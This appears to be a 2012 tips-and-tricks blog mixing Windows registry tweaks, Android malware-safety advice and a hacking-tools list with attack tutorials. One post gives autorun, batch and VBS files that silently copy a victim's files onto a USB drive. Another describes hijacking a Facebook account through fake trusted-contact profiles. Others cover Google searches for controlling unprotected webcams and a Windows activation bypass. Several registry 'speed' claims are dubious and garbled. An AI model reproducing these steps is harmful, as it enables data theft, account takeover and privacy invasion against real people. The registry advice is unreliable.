RSS
Facebook
Twitter

Friday, 19 October 2012

To Increase the Internet Speed:


Open Notepad and paste the below code in it.
 [HKEY_LOCAL_MACHINE\SYSTEM\Curr entControlSet\Servic es\Tcpip\Parameters]
 "SackOpts"=dword:00000001
 "TcpWindowSize"=dword:0005 ae4c
 "Tcp1323Opts"=dword:000000 03
 "DefaultTTL"=dword:0000004 0
 "EnablePMTUBHDetect"=dword:000 00000
 "EnablePMTUDiscovery"=dword:00 000001
 "GlobalMaxTcpWindowSize"=dword :0005ae4c
 Now save this file as speed.reg. Execute it and observe the change!

TURN ON UR PC IN JUST 10 SECONDS........


so u wanna know how to turn the pc on in 10 seconds (may vary)
 here's what u have to do to turn ur pc on in 10 seconds
 Click on the start button then press R it will take u to Run well go to run
 n type Regedit
 press enter
 this will open Registery Editor
 now look for the key
 HKEY_LOACAL_MECHINE\SYSTEM\Cur rentControlSet\Contr ol\ContentIndex
 now there find the Key Called
 "Startup Delay"
 Double Click On It
 Now where its Base
 Click Decimal
 Now its Default Value Is 4800000 (75300:hexadecimal)
 Change The Value To 40000
 here u go u have done it
 now close the Registery Editor and Restart Your Computer
 You'll See The Result.

Be Careful Before Download

There are many applications in the Android market, an attractive and of course tempting to download.

There is one example of an interesting story to be known. For example, in our minds are already planning to decide to download this application. However, because many first rate, it seems problematic applications. However, when seen again, the application has been downloaded more than 10,000 users already have 19 people who gave rating 5. Confused?

After examining it carefully, then known there was something wrong with this application. It turns out the publisher's written statement is MICROSDFT CORPORATION with msM.com website address. From there it is known that the application (may be) is a malware that will steal personal data or credit will suck too, because it automatically serves as a call premium service.

In conclusion, carefully before downloading the application on the Android Market. And if a similar application is found, you can e-mail to Android Police, Flag As Inappropriate Device In The Market, Report It On The Web, as well as the left one star review.

There are a few tips you can do to avoid dangerous malware:

1. Do not install the application apart from the Android Market.

Some time ago, android trojan was found in some third-party application service provider in China. Therefore, do not ever try to download much less to install applications that do not originate from the Android Market.

2. Be careful when an application is requesting permission to open access to personal data.

Indeed, some applications will ask for permission to open some of the current data will make the installation process. But, make sure when you do not give it permission to access private data into the data let alone a phone contact list.

3. Use the special security applications Android smartphone.

Using specialized security applications are highly recommended. In addition to providing protection from dangerous malware, security applications such as Trend Micro Mobile Secutiy will secure all mobile banking transactions that could be done.

New Kind Of Virus Attacking Android Phones

PHILADELPHIA (CBS) – The most popular mobile platform in the country is the target of a virus that experts say is a new kind of attack. It’s a reminder that our smartphones and tablets aren’t immune from computer criminals.

This Trojan is called ‘NotCompatible.’ It tricks Android users who visit a compromised website into downloading what appears to be a system update.

“This malware doesn’t actually compromise any of your personal information, so none of your account information or your credit card number, as far as we’ve been able to determine,” says Kevin Mahaffey, chief technology officer at the mobile security firm Lookout. “But what it does do is turn your phone into a relay — a tunnel, if you will — so the attackers can actually start bouncing network data off your phone.”

He says fraudsters would be interested in this kind of thing to help hide the source of their crimes. For instance, routing data through your device to fool the algorithms designed to protect merchants from such nefarious acts.

“The other potential use for this is if you have a phone that’s connected to an internal corporate or government network, the attacker could potentially use that phone to access sensitive resources inside the wall of the network.”

He says they’ve been able to take down a number of servers hosting the virus, but this may be the opening salvo of a mobile malware offensive. AVG, Lookout, and Avast are well-rated — and free — anti-virus choices for your device.
Tips for Secure Android Tablet From Virus Attacks
Android smart phone devices or tablet when frequently used for browsing or receive files from other devices it will be susceptible to a virus (malware). Moreover, users who frequently download applications or information on the virtual store.

Even the practitioners on the hardware virus has been detected three false for the update installer application for Android, which Androidos_ADSMS.A, Androidos_Dordrael.l, and Androidos_crusewin.A. So is the latest Android Malware, called Droid Dream Light (DDLight). Malware has managed to outwit 30000-120000 Android users. Outside it's still a lot of viruses or other malware.

Here are some tips for your favorite Android device safe from virus attacks or malicious malware:

1. Take advantage of standard safety features in Android device
Go to menu> Settings, then Select> Location & Security> and enter the data as no PIN and Password to lock the phone. This is useful for securing personal data when the phone is lost physically.

2. Do not select the Auto setting Connect to Wi-Fi
Go into the menu> Wireless & Network, and select> WiFi Settings, disable the function Auto Connect to Wi-Fi. Especially if you are using Internet banking.

Android devices are usually connected to wifi (especially abroad) are even more vulnerable infiltrated by hackers (hackers). Weak security as experienced by the applications using named ClientLogin authentication protocol that runs on Android OS version 2.3 to the bottom.

With ClientLogin, users only need to enter username and password required. Further application authentication process will take from the data stored on the ClientLogin. ClientLogin authentication data is stored on security that has a vulnerable system. Hackers can access data stored on the ClientLogin authentication is when a user connects to the network Unencrypted Wifi.

The solution, avoid the use of unencrypted wifi network (wifi network is open). But if the choice of open wifi networks only, it is better to use additional applications for the security of wifi connections such as SSH Tunnel. This application can create secure connections between your Android handset devices with unencrypted wifi jatingan server.

3. Avoid application installed aside from the Android Market
To avoid the Trojan Android, install only the applications in the Android Market. Recently discovered Trojan Android from a third party application service provider in China.

4. Be careful when an application for permission to open access to personal data
If the application is installed for permission to open some of the data, make sure you do not give access permission to enter personal data, such as phone contact list.

5. Use the special security applications your Android device
In addition to installing and vigilant when opening a particular link, you are advised to also install security applications for mobile phones. Trend Micro Mobile Security for Android for example, not only do we have secure passwords, but also all of our mobile banking transaction data.
And lastly, it tips over if something is missing if the mobile device or tablet-owned limited support from the technology side.

It's Time to Tab
As one of the Tablet Android market leader, Samsung proves its existence in the tablet computer with access to all segments of the existing tablets. Ranging from sailing 7-inch tablet, 10.1 inches, up to 8.9 inches.

Not strange indeed if the tablet PC Samsung is the best selling tablet computers in Indonesia. Security features that are tested, plus a charming form of the Android OS uses a lot of people chasing him.

Please visit www.samsung.com / id or via mobile phone in m.samsung.com / id. Also get the latest info from the family of Samsung Galaxy Tab in http://www.facebook.com/SamsungMobileIndonesia community.

Thursday, 18 October 2012

Activation Windows 8 PMS
How to activate Windows 8? New activators of Windows 8. Last activators of Windows 8. Activate Windows 8 RTM. Windows 8 RTM OEM Activation. Activate Windows 8 Final. Windows 8 Loader. Activate Windows 8 Release Preview.
Activator Windows 8 ? 1
Windows 8 Activator KMS - an activator of Windows 8. Allows you to easily disable Timebomb in Windows 8 and activate it for 180 days. Activator allows you to bypass the restrictions on time steps (timebomb) for Windows 8, causing activation was not possible and this caused some inconvenience for want test the Win 8 at this stage of development.
Windows 8 will be activated for 180 days and then will need to repeat the activation procedure. You can use the mini-KMS Activator and set the activation service, which will allow to forget about the limit of 180 days (activation will be automatic). Select the activation method of your choice, the main problem - remove timebomb, has successfully solved this activator.

Download Activation Windows 8 Genuine Activator 
Changes in version:
  • Logging feature
  • Everything could be done in Normal Mode now
  • Credits updated
  • No more freezing window during activation or refresh
  • Enabling hidden features now displays message after completion
  • Timebomb restore fixed

Local Install Source copies Office installation source files from the Microsoft Office 2003 installation media into a hidden folder on the hard drive called the Msocache folder. This describes how to remove this folder.


Local Install Source creates this hidden folder when Office 2003 is installed to prevent the user from having to insert the CD during installation and maintenance.
It usually takes up > 200 MB of space. You’ll have to decide if this convenience is worth the hard drive space or not.
You can prevent it from being place on your drive in the first place by selecting Delete installation filescheck box during the installation.
Removing it once it is created is not difficult. 1. Do not use explorer to delete this folder. Just running the Disk Cleanup Wizard will take care of it.
    1. Click Start
    2. Select All Programs
    3. Select Accessories
    4. Select System Tools
    5. Click Disk Cleanup
    6. Disk Cleanup will do its calculations
    7. From the Drives list in the Select Drive dialog box, select the hard drive that contains the Msocache folder
    8. More calculations…
    9. Select the Office Setup Files checkbox in the Files to Delete list
    10. Click OK.
    11. When you are asked Are you sure you want to delete these files? select Yes
Moving or repairing of this folder is possible as well. Just use this tool:
http://www.microsoft.com/office/ork/2003/journ/listool.htm

Remove duplicate files

I have always wanted this kind of software. I have thousands of mp3 songs packed in various partitions of my hard disk. I have collected these songs from several places and keep them storing, but the problem while augmenting my collection is that I am never sure whether I have copied the set of songs before or not, so I just copy them irrespective of the fact that they may be already present. The consequence is that my limited 40GB hard disk space is almost full leaving me with no more space to store anything else. That is why I always wanted a software that could compare the contents of two folders and remove the duplicate elements...
File Comparator is a program which compares any files by their contents. This utility allow you to quickly compare contents of any files in specified folders, and allow to show files which contain same data.

Thursday, 11 October 2012

Hacking TipsThis is a featured page



Hacking using webcam....

It's rather a tutorial to show you how to do a simple search for unprotected webcams on the net.

This is only for fun purposes...

You are totally responsible for your actions...

(note: these are not personal webcams, this is only a guide on how to view public webcams such as traffic cams)


START

Go to this link :
www.google.com

and put this into the search Bar
inurl:/view/index.shtml
or
intitle:liveapplet inurl:LvAppl

and click on google search...

it would show you a list of searched items.
Go to any of the links...Some of them don't work.

You will be able to see street/Traffic cams...

and not only this..you can also control them move them right or left or zoom in or out...

It's kind of fun

Have fun.

NOTE : You should a have high speed connection for this...

Create Folders And Files With NO! Name

This trick will allow you to create files and folders without any name.

Just follow the following steps:
1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.

Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don't type the numbers which are present on top of the character keys.

4.Press Enter and the nameless file or folder will be created.

Reason: The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces. Just follow these steps below:

1.Select file, press F2.
2.Hold alt key and type 0160 from the numpad.
3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
4.Press enter and you will have second nameless file in the same directory.
5.Repeat step 3 to create as many nameless files or folders in the same directory.

(we've had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)



Hide Your Files In A JPEG !!
Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

Ok, lets begin…

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. :D

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .

Running Multiple Yahoo Messengers

It is possible to run multiple Yahoo Messenger simultaneously right after installing the official version of Yahoo Messenger.

You will need to apply a simple windows registry patch to enable this feature.

>>Follow these simple steps :

1. Open the notepad
2. Copy the following code
REGEDIT4 [HKEY_CURRENT_USER\Software\yahoo\pager\Test] "Plural"=dword:00000001

3. Save the above code as multi.reg
4. Either double click on this file or right click on it and select merge option. (aim is to merge this settings into windows registry)

Booting Xp With A Pen Drive

There are times when a minor error in the Windows Registry or a Virus Infection, can make your system unbootable. In such a condition a properly configured USB drive on hand with Bart Lagerweij's free utility (BartPE), is a handy replacement for windows operating system.

BartPE will give you a complete Win32 environment with network support, a graphical user interface (800x600) and FAT/NTFS/CDFS file systemsupport.

Don't confuse BartPE with Microsoft's Official Windows PE. BartPE has got some interesting features as compared to Windows PE and it's a freeware.

Requirements To Install BartPE:
:: USB Flash drive with at least 256 MB of storage capacity.
:: The files from your Windows Installation CD-Rom.

How It Works:
:: PE Builder, condenses the original setup data for Windows XP into a slender operating system that is ready to run from or a USB flash drive.
:: This compact, portable version of Windows includes all the important system tools for dealing with a PC emergency.
:: You can even add other programs to this collection, such as the media writing tool Nero Burning ROM or an anti-spyware package such as Ad-Aware SE Personal, during the installation process.

Steps Involved:
:: Download the latest PE Builder version (self-installing package) and install it.
Start PE Builder (pebuilder.exe) and insert Microsoft Windows XP installation/setup CD, it will condense the setup files into your pen drive.
:: At the main PE Builder dialog, select the "Pen Drive" option. Hit the "build" button. PE Builder will now ask you to create a BartPE directory, answer with "yes".
:: PE Builder will now start building BartPE. This will take a few minutes. You will see a lot of files getting copied and/or decompressed, into your pen drive. If the data verify was correct and there where no errors reported you can boot the Pen Drive.


Tuesday, 9 October 2012

Hacking GPS Book




  • This is the "user manual" that didn't come with any of the 30 million GPS receivers currently in use, showing readers how to modify, tweak, and hack their GPS to take it to new levels!
  • Crazy-cool modifications include exploiting secret keycodes, revealing hidden features, building power cords and cables, hacking the battery and antenna, protecting a GPS from impact and falls, making a screen protector, and solar-powering a GPS
  • Potential power users will take the function and performance of their GPS to a whole new level by hacking into the firmware and hacking into a PC connection with a GPS
  • Fear not! Any potentially dangerous mod (to the device) is clearly labeled, with precautions listed that should be taken
  •  Game time! Readers can check out GPS games, check into hacking geocaching, and even use a GPS as a metal detector

Wednesday, 3 October 2012

hack ip using facebook.....



FOLLOW THIS STEPS.....
1. First you got to find out the IP address of that User.
To Do so we will be using “netstat” command in windows for this pc trick. If you want to know the IP address of a specific person on facebook or orkut or any chat service, there is only one way: Just invite or ping him for a chat and while chat is ON open ‘Command Prompt‘ on your PC (Start >Run>cmd).
Note: before trying this make sure you close all the other tabs in your browser. and only facebook is open. also if possible delete all the history and cache from your browser.
Now the next step that you have to do for this facebook trick is opens the command prompt Type the following command and hit Enter.
netstat -an.. or you can read my older hack trick to know the ip address of other...
And you will get all established connections IP addresses there. Note down all the suspicious IP’s

2.The Next PC Trick is to trace that user using his IP address:
To do this facebook tricks we will be using IP tracer service. For this Go to the following address : http://www.ip-adress.com/ip_tracer/
and paste the IP address in the box that says “lookup this ip or website”. and it will show you the location of the user.
It will show you all the information about that user along with his ISP and a Location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area. If any serious matter just note down the ISP details in that page and contact them about the IP. they will respond you. Use this facebook trick if you are in aproblem with some unknown friend.

Thursday, 27 September 2012

Ever felt like carrying your Ubuntu, Fedora, Tiny-core and all other OS’s iso in your pen drive? Yes, you can now carry all your favorite Operating systems with you wherever you go and boot from them using the same USB drive.MultiBoot USB is a freeware which can help you to use the multiple OS iso files on the samepen drive.

MultiBootISOs-USB-Creator
To use the MultiBoot on your pen drive it must meet some requirements first. You’ll require a FAT32 formatted pen drive and a computer which can boot from a USB device. Prefer using an 8-16 GB pen drive so that you can have more different operating systems on it.
To start off first download the MultiBootISO’sfrom here . Run the executable and follow the instructions. Browse to the ISO file you want to load on your USB drive and build the bootable USB using it. You might have to format yourpen drive during the process so do take a backup of all your data which is there on the pen drive.

To add more ISO files repeat the same procedure. Restart your PC and set the highest priority for the USB drive to boot from it and done. Do give it a shot!!! :)

Download MultiBoot ISO’s (781 KB) (Freeware)

Hacking computer during the chatting

T his is for educational purpose only ...Hack PC while chatting
I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.

Following are the features : -

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio

HELLo friends today i m share with you one more trick How to make USB Drive a dead hard disk,Some time you have purchase new laptop or you have crash CD or waste garbage. Using a dead Hard Drive.
Step :1
Take A Hard Disk.

Step :2 Open cover

Easy way to hack facebook....

In this tutorial no skill is required, we'll just use the password recovery process with 3 fake profiles.

(The fake profiles should be at least three weeks old)
.

For this you need to make 3 fake profiles on Facebook, and the victim that you want to hack should be added to the friend's list mutual friends would be nice. 

Recovery process, which is accessible through Forgot your password? on the Facebook login page.

Then you need to identify your victim's account by using his Facebook E-mail, Facebook name or Facebook name + Facebook friend's name. It would be easier to identify the victim with his or her facebook name. When you got the account, just click on This Is My account.

Once you could identify you're victimss profile, Facebook suggests you to recover the password by the existing email address. You can bypass that by clicking on No longer have access to these?

Then Facebook will ask a secret question(If the victim has one), to bypass that, you'll need to type the wrong answer three times. After that Facebook will try to help you recover the password by the support of 3 friends.

Just select your three fake profiles that your slave added to his friends.(The friends must be registered more than three weeks).

Then you'll get the code on your fake profiles, with those 3 codes you can easily change the password.

hacking using pendrive





This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice.

Process is very simple as we have to add only 4-5 notepad files in the flash drive.
Follow the following steps :-

1. Create a notepad file with name autorun.inf nad copy the following code.


[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
2. Create another notepad file of name file.bat and copy the following code.
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off

cls
3. In our 3rd notepad file, copy the following code and save it as invisible.vbs

CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False

4. And in our last notepad file, copy this code and save the file as launch.bat

 wscript.exe \invisible.vbs file.bat

5. Now, copy all this 4 files in the root of  flash drive. And create a folder "all" where the content is to be copy.

6. Test this in your own computer first, before inserting this flash drive in victim's computer.

.Use Ctrl-C to Abort a Command

Just about any command can be stopped in its tracks with the abort command: Ctrl-C.
If you haven't actually executed a command, you can just backspace and erase what you've typed, but if you've already executed it then you can do a Ctrl-C to stop it.

1.Warning: Ctrl-C isn't a magic wand and it can't undo things that aren't undoable, like a partially complete format command. However, for things like the dir command that seem to go on forever or questions you're asked at the prompt that you don't know the answer to, the abort command is an excellent Command Prompt trick to know.

2. View a Command's Results One Page (or Line) at a Time
More Command - Command Prompt Tricks
Ever run a command, like the dir command, that produces so much information on the screen that it's almost useless? You're not alone.
One way around this is to execute the command in a special way so whatever information is generated is shown to you one page, or one line, at a time.
To do this, just type the command, the dir command for example, and then follow it with the pipe redirection operator and then the more command.
For example, executing dir /s | more will generate the thousands of lines of results that you expect from the dir command, but the more command will pause each page of results with -- More -- at the bottom of the page, indicating that the command is not done running.
Just press the space bar to advance by page or press the Enter key to advance one line at a time.
See Command Prompt Trick #7 below for a different solution to this problem.

3. Run Command Prompt as an Administrator Automatically

Command Prompt Admin Shortcut - Command Prompt Tricks
Many commands require that you execute them from an elevated Command Prompt in Windows - in other words, execute them from a Command Prompt that's run as an administrator.
You can always right-click on any Command Prompt shortcut and choose Run as administrator but creating a shortcut to do the same thing can be a huge time saver if you're a frequent Command Prompt power user.
To complete this Command Prompt trick, just create a Command Prompt shortcut on the desktop, enter the shortcut's properties and then select the Run as administrator box located in the Advanced button on the Shortcut tab.

4. Become a Command Prompt Power User with Function Keys

Command Prompt Function Keys - Command Prompt Tricks
The fact that the function keys actually do something in the Command Prompt is maybe one of the best kept secrets about the tool:
F1: Pastes the last executed command (character by character)
F2: Pastes the last executed command (up to the entered character)
F3: Pastes the last executed command
F4: Deletes current prompt text up to the entered character
F5: Pastes recently executed commands (does not cycle)
F6: Pastes ^Z to the prompt
F7: Displays a selectable list of previously executed commands
F8: Pastes recently executed commands (cycles)
F9: Asks for the number of the command from the F7 list to paste
Command Prompt Trick #17 is full of arrow key shortcuts, a few of which are similar to these function key tricks.

5. Hack the Prompt Text

Prompt Command - Command Prompt Tricks
Did you know that the prompt itself in the Command Prompt is completely customizable thanks to the prompt command? It is, and when I say customizable, I mean really customizable.
Instead of C:\>, you can set the prompt to any text you want, have it include the time, the current drive, the Windows version number, you name it.
One useful example is prompt $m$p$g which will show the full path of a mapped drive in the prompt, alongside the drive letter.
You can always execute prompt alone, without options, to return it to its sometimes boring default.

6. Get Help for Any Command

Help Switch - Command Prompt Tricks
Believe it or not, the help command does not provide help for every Command Prompt command. However, any command can be suffixed with the /? option, usually called the help switch, to display detailed information about the command's syntax and often times even some examples.
I doubt that the help switch is the coolest Command Prompt trick you've ever heard of, but it's hard to disagree that it's one of the more useful.
Unfortunately, neither the help command nor the help switch offer much in the way of explaining how to interpret the syntax. See How To Read Command Syntax if you need help with that.

7. Save a Command's Output to a File

Command Output - Command Prompt Tricks
An incredibly useful Command Prompt trick is the use of redirection operators, specifically the > and >> operators.
These little characters let you redirect the output of a command to a file, giving you a saved version of whatever data the command produced in the Command Prompt window.
Let's say you're about to post a computer problem to an online forum, like my computer support forum for example, and you want to provide really accurate information about your computer. An easy way to do that would be to use the systeminfo command with a redirection operator.
For example, you might execute systeminfo > c:\mycomputerinfo.txt to save the information provided by the systeminfo command to a file. You could then attach the file to your forum post.
See How To Redirect Command Output to a File for more examples and a better explanation of how to use redirection operators.

8. View Your Hard Drive's Entire Directory Structure

Directory Structure with Tree Command - Command Prompt Tricks
I think one of the neatest little commands is the tree command. With tree, you can create a kind of map of your computer's directories.
Execute tree from any directory to see the folder structure under that directory.
Tip: With so much information, it's probably a good idea to export the results of the tree command to a file. For example, tree /a > c:\treeresults.txt, just as explained in Command Prompt Trick #7.
Ads
LG Cinema 3D Smart TVBrowse Content, Download Apps, play Games Direct on your Screen. Check!www.lg.com
Registration of DomainStarting @ Rs329. India's #1 Domain & Hosting Provider. 24/7 Support.www.BigRock.in

9. Customize the Command Prompt Title Bar Text

Command Prompt Title Bar - Command Prompt Tricks
Tired of that Command Prompt title bar text? No problem, just use the title command to change it to whatever you like.
For example, let's say your name is Maria Smith, and you want to express your ownership of the Command Prompt: execute title Property of Maria Smith and the Command Prompt's title bar will change immediately.
The change won't stick, so the next time you open Command Prompt the title bar will be back to normal.
The title command is usually used to help give a custom appearance in script files and batch files... not that I'm saying titling it with your name isn't a good idea!

10. Copy From the Command Prompt

Mark Feature in Command Prompt - Command Prompt Tricks
As you may or may not know, copying from the Command Prompt is not as easy as copying from other programs, which is part of the reason why saving a command's output to a file, Command Prompt Trick #7, is so handy.
But what if you do just want to copy a short section of text to the clipboard? It's not too hard but it's not very intuitive either.
Right-click anywhere in the Command Prompt window and choose Mark. Now, highlight with your left mouse button whatever you'd like to copy. Once your selection is made, press Enter.
Now you can paste that information into whatever program you'd like.

Download your facebook data

Hi friends! Today I am going to tell you how to download all of your facebook data like status, messages and pictures in a rar file. You may be using facebook for years and might have uploaded many more statuses and pictures. Some peoples are habituated to write even a small thing on facebook like "going to market", "going home.." and many more.
This may be very dangerous in the situation when his/her ID is hacked by any hacker. Facebook gives us facility to archive and download all the data.
Here are the simple steps:
1. Open the account setting menu.

Hacking Tools

Here, i have collect some best hacking tools for you. That are listed below: 

ethicalhacking
Ethical Hacking


Nessus
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.



Snort
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Netcat
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol



TCPdump
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.

Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

DNSiff
DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Ettercap
>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.

Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.

John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix.

OpenSSH
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

TripWire
Tripwire is a tool that can be used for data and program integrity assurance.

Kismet
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.

NetFilter
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.

IP Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

pf
OpenBSD Packet Filter

fport
fport identifys all open TCP/IP and UDP ports and maps them to the owning application.

SAINT
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

OpenPGP
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

 
Metasploit
Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only.



Diy Cell Phone Mouse

Hi,Friends here some cool tricks...

Diy Cell Phone Mouse 

Many laptop owners carry a spare mouse because they dont like the built in control, or because they just like to use a mouse. This adds weight, things to remember etc when you go anywhere. Also, if you use somebody elses laptop you may not be able to use their pad at all! I often setup software for somebody else on a laptop and curse the wigglestick on the keyboard that they fumble on with because they are that slow anyway but it holds me up. If I had a mouse with me at all times that would be amazing. So, the NokiaMouse was born.